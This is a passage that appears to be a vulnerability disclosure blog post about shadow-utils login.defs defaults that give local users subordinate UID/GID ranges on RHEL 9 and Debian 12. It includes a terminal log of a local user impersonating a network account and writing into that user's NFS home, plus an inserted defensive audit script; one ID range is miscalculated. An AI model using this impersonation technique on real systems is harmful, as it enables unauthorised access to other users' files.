Shadow Utilities Introducing A Ticking Timebomb With Subordinate ID Configuration?

December 20, 2024 by Synephore, Jonathan Hall

It appears that shadow-utils for Linux is now shipping an /etc/login.defs file that pre-defines ranges of subordinate UIDs and GIDs. As a result, adding a local user to the system automatically creates entries for that user in /etc/subuid and /etc/subgid, with a unique range per user, starting at UID/GID 100000.

On a fresh install of Red Hat Enterprise Linux 9, I already have a local user (jon) that was added as part of the install. This resulted in an entry for it in /etc/subuid and /etc/subgid giving it the subordinate IDs 100000-165535. I then added a second user (testacct), confirming that another entry was indeed created in /etc/subuid for this new user, delegating IDs 165536-331072 to it.


Why is this a problem?

Entries in /etc/subuid and /etc/subgid are commonly thought of as being for containers, but they are not solely for "containers." While containerization is certainly the largest use case, the subordinate ID configuration delegates to a user the right to use the specified IDs within user namespaces. Becoming or using those IDs is not the most straightforward thing to do (for instance, you can't just su or setuid to them), but once you understand how the namespacing works it is still relatively trivial to become and use those IDs on the system.

As a simple POC, let's look at the following (code below):

In the above, we can see that the user 'jon' has a delegation for 100000-165535. Again, this was done solely by adding a user; I did not configure this. Using a quick Python script that changes the UID mapping of a user namespace as that very same user, I can now effectively execute my sleep command as any ID I choose within the delegated range. In the above example, I've executed my sleep command as UID 160000.

In short, such a configuration allows the user to execute any command they wish as any UID/GID delegated to them in /etc/subuid and /etc/subgid.

If you work in a large infrastructure, you undoubtedly have valid IDs in the 100000+ range. This default puts those IDs at risk of unintended impersonation through numerous vectors whenever local accounts are added to the system and users have access to them.
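As a defensive check (an added example, not the author's withheld POC and not shadow-utils code), the following Python audits subuid/subgid-style delegations against the accounts a host resolves and flags every real account whose numeric ID falls inside a range delegated to a different local user. The sample /etc/subuid and passwd contents are constructed to mirror the post; on a real host you would feed it /etc/subuid (or /etc/subgid) together with the output of getent passwd (or getent group).

```python
"""Audit subordinate-ID delegations against real accounts (added example, not the post's POC).
Flags each account whose ID lies inside a /etc/subuid or /etc/subgid range delegated
to a different local user, i.e. an ID that local user could map into a user namespace."""
from typing import Dict, List, NamedTuple, Tuple


class SubIdRange(NamedTuple):
    owner: str    # local user the range is delegated to
    start: int
    count: int

    @property
    def end(self) -> int:  # inclusive upper bound of the range
        return self.start + self.count - 1


def parse_subid(text: str) -> List[SubIdRange]:
    """Parse 'owner:start:count' lines, the format of /etc/subuid and /etc/subgid."""
    ranges = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            owner, start, count = line.split(":")
            ranges.append(SubIdRange(owner, int(start), int(count)))
    return ranges


def parse_passwd(text: str) -> Dict[int, str]:
    """Map numeric ID -> account name from passwd/group-format lines (getent output)."""
    ids = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) >= 3:
            ids[int(fields[2])] = fields[0]
    return ids


def find_impersonable(ranges: List[SubIdRange], accounts: Dict[int, str]) -> List[Tuple[str, int, str]]:
    """Return (range owner, ID, account) for every account inside someone else's range."""
    return [(r.owner, i, name) for r in ranges
            for i, name in sorted(accounts.items())
            if r.start <= i <= r.end and name != r.owner]


# Constructed sample data mirroring the post: jon and testacct received the default
# 65536-ID ranges; msteph and svc-backup are hypothetical directory (network) accounts.
SUBUID = "jon:100000:65536\ntestacct:165536:65536\n"
PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
          "jon:x:1000:1000::/home/jon:/bin/bash\n"
          "msteph:x:108472:108472::/mnt/home/msteph:/bin/bash\n"
          "svc-backup:x:200001:200001::/var/lib/backup:/sbin/nologin\n")

if __name__ == "__main__":
    for owner, uid, victim in find_impersonable(parse_subid(SUBUID), parse_passwd(PASSWD)):
        print(f"local user {owner} can map UID {uid} ({victim}) into a user namespace")
```

Any hit is a range that should be moved or shrunk (SUB_UID_MIN/SUB_UID_MAX in login.defs, or the entry removed from /etc/subuid) so that delegated ranges never overlap IDs your directory actually issues.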

Further, if this has been done for login.defs, where else may this assumption end up creeping in?

I have no doubt that this was done with the intention of supporting rootless containerization, a trend rapidly rising across multiple organizations. However, no distribution, and no component running on a distribution, should be making these kinds of assumptions on your organization's behalf.

This was tested and confirmed on both Debian 12 and Red Hat Enterprise Linux 9.


POC

Debian, Red Hat and the shadow-utils maintainers have been contacted, and I'm awaiting a response before releasing the POC code.

The listing below shows the abuse in action. As my local user created during OS install, I am able to compromise the network account of another user and write files to their NFS home directory.

[jon@localhost ~]$ id;uname -a;cat /etc/subuid
uid=1000(jon) gid=1000(jon) groups=1000(jon),10(wheel)
Linux localhost.localdomain 5.14.0-503.14.1.el9_5.aarch64 #1 SMP PREEMPT_DYNAMIC Fri Nov 15 07:14:03 EST 2024 aarch64 aarch64 aarch64 GNU/Linux
jon:100000:65536
[jon@localhost ~]$ getent passwd msteph
msteph:x:108472:108472::/mnt/home/msteph:/bin/bash
[jon@localhost ~]$ ls -al subdo;getcap subdo
-rwxr-xr-x 1 jon jon 72936 Dec 22 23:12 subdo
[jon@localhost ~]$ ./subdo -u 108472 -g 108472 -r 1 bash
bash: /home/jon/.bashrc: Permission denied
bash-5.1$ id
uid=108472(msteph) gid=108472(msteph) groups=108472(msteph),65534(nobody)
bash-5.1$ cd ~msteph
bash-5.1$ ls -al
total 16
drwx------  3 msteph nobody  99 Dec 22 23:19 .
drwxr-xr-x. 8 nobody nobody  85 Dec 22 23:18 ..
-rw-------  1 msteph msteph  20 Dec 22 23:19 .bash_history
-rw-r--r--  1 msteph nobody  18 Apr 30  2024 .bash_logout
-rw-r--r--  1 msteph nobody 141 Apr 30  2024 .bash_profile
-rw-r--r--  1 msteph nobody 492 Apr 30  2024 .bashrc
drwxr-xr-x  4 msteph nobody  39 Dec 20 09:10 .mozilla
bash-5.1$ touch testing123
bash-5.1$ ls -aal
total 16
drwx------  3 msteph nobody 117 Dec 22 23:23 .
drwxr-xr-x. 8 nobody nobody  85 Dec 22 23:18 ..
-rw-------  1 msteph msteph  20 Dec 22 23:19 .bash_history
-rw-r--r--  1 msteph nobody  18 Apr 30  2024 .bash_logout
-rw-r--r--  1 msteph nobody 141 Apr 30  2024 .bash_profile
-rw-r--r--  1 msteph nobody 492 Apr 30  2024 .bashrc
drwxr-xr-x  4 msteph nobody  39 Dec 20 09:10 .mozilla
-rw-r--r--  1 msteph msteph   0 Dec 22 23:23 testing123
bash-5.1$

